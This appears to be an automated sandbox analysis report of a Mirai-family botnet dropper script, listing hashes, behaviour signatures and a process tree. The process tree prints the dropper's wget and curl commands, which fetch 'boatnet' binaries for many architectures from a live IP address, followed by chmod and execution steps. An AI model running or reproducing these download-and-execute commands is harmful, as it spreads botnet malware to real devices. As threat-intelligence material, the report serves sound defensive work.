Analysis
-
max time kernel
149s -
max time network
134s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
19-01-2025 17:57
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
a6ab6f96f6881539ccc0aefa53d99da6
-
SHA1
eeeb59012c94058a106073e1595f84df20445979
-
SHA256
a6bf5dd9b9c5ea86b4a816ea60f94bc0cf68ef6c23ec63d52edf9ddf875d7e34
-
SHA512
ef0e55585920063d79f5508c6546ebe72dae9c8a5d59faf2fa3d3f3200fa6e970c0ead949638fd853bd752536aea1784fe70397fde0e8bee12478e55b3e6c600
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 864 chmod 728 chmod 760 chmod 779 chmod 800 chmod 816 chmod 858 chmod 736 chmod 870 chmod 876 chmod 885 chmod 744 chmod 810 chmod 836 chmod 891 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 729 WTF /tmp/WTF 737 WTF /tmp/WTF 745 WTF /tmp/WTF 761 WTF /tmp/WTF 780 WTF /tmp/WTF 801 WTF /tmp/WTF 811 WTF /tmp/WTF 817 WTF /tmp/WTF 837 WTF /tmp/WTF 859 WTF /tmp/WTF 865 WTF /tmp/WTF 871 WTF /tmp/WTF 877 WTF /tmp/WTF 886 WTF /tmp/WTF 892 WTF -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral3/files/fstream-1.dat upx behavioral3/files/fstream-4.dat upx -
description ioc Process File opened for reading /proc/675/cmdline WTF File opened for reading /proc/757/cmdline WTF File opened for reading /proc/789/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/793/cmdline WTF File opened for reading /proc/794/cmdline WTF File opened for reading /proc/813/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/889/cmdline WTF File opened for reading /proc/699/cmdline WTF File opened for reading /proc/692/cmdline WTF File opened for reading /proc/698/cmdline WTF File opened for reading /proc/740/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/667/cmdline WTF File opened for reading /proc/697/cmdline WTF File opened for reading /proc/750/cmdline WTF File opened for reading /proc/769/cmdline WTF File opened for reading /proc/776/cmdline WTF File opened for reading /proc/877/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/788/cmdline WTF File opened for reading /proc/803/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/861/cmdline WTF File opened for reading /proc/868/cmdline WTF File opened for reading /proc/696/cmdline WTF File opened for reading /proc/756/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/775/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/873/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/691/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/808/cmdline WTF File opened for reading /proc/819/cmdline WTF File opened for reading /proc/841/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/674/cmdline WTF File opened for reading /proc/669/cmdline WTF File opened for reading /proc/702/cmdline WTF File opened for reading /proc/705/cmdline WTF File opened for reading /proc/805/cmdline WTF File opened for reading /proc/840/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/664/cmdline WTF -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 732 wget 734 curl 735 cat -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.sh4 curl File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.i468 curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:699 -
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:703
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/catcat boatnet.x862⤵PID:727
-
-
/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:729
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:732
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:734
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:735
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:737
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:741
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/catcat boatnet.arc2⤵PID:743
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:745
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.i4682⤵PID:747
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/catcat boatnet.i4682⤵PID:758
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:761
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.i6862⤵PID:763
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/catcat boatnet.i6862⤵PID:778
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:780
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.x86_642⤵PID:781
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/catcat boatnet.x86_642⤵PID:798
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:801
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:803
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/catcat boatnet.mpsl2⤵PID:809
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:811
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:813
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/catcat boatnet.arm2⤵PID:815
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:817
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:819
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/catcat boatnet.arm52⤵PID:835
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:837
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:841
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/catcat boatnet.arm62⤵PID:857
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:859
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:861
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/catcat boatnet.arm72⤵PID:863
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:865
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:867
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/catcat boatnet.ppc2⤵PID:869
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:871
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:873
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/catcat boatnet.spc2⤵PID:875
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-Y35FUl WTF2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:877
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:879
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/catcat boatnet.m68k2⤵PID:884
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:886
-
-
/usr/bin/wgetwget http://154.213.186.64/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:888
-
-
/usr/bin/curlcurl -O http://154.213.186.64/hiddenbin/boatnet.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/catcat boatnet.sh42⤵PID:890
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:892
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD54f16ad7bf124db03b82939cfae92f15e
SHA16c6d17f48d583c5d3c002f4fc3a5390642d637fe
SHA25696d6d379169a9a89a3704fbdeebce0698200440dcd5e6d814a96f2960f463573
SHA512c01e6c9fd4475b69092e1cc6f9eaadefc54d91dffcee63c1c23f9ad3b392791f0371f841f075a948ce67f8d65387fbaef38c943d67511f9d143d83667e50c2cf
-
Filesize
121KB
MD5ec59d866ca314089702cad40a77aeebc
SHA14fa9bd7716542472cfa27dc9dc4dd664633af350
SHA256c9216d4e33ba2a5ad059029216b4401f360e3db0e326975ebf088b8a8588d472
SHA512d42862983fe554e1ce6873fb9e5763451cf052d97452bcdc92c298a374f922e57d76569d915708a261890088f8da0b881e6407979b497486ce7da7493f3a650b
-
Filesize
220B
MD5f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1750274b02d5f5b00026a4f55b020f4285c693533
SHA256219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA51236bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259
-
Filesize
220B
MD5a8f502a6fb3b7b940e922c951d9e493a
SHA1fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338
-
Filesize
75KB
MD5839f6ad27dac29d4bb109eb01539a914
SHA13a477d4e91439b652554cc450c97da6769883b7f
SHA25658b6d063fdfd52f1f8054fa6223aa31fe4f408d18cb4ad7275b63403b1fcbb0d
SHA512706816e8ba5558bd80a53c5e8584ee85ee4b4a3a9a4db28916954435d7f98802215cf62b77bf716a93992102c9755853c308e7d235fd61e78d857e463b12e725
-
Filesize
28KB
MD53630b4a04d550fb036675b516a910399
SHA17dd4e3efc4a7713d80ec4b8fbc5c0fd649038e7b
SHA256a288c8c9d8fd6c92636bef0e8acf08f0d0d20b4108af37cea8385e7ad947dc67
SHA512e33d21707d574422331610445e4fcdc08b7064f6988c022d27cc3650392940561891bd3ba7d97bc3ee1653ab818c7c815c65b2e8ffa0a14b9c6ea801da499b71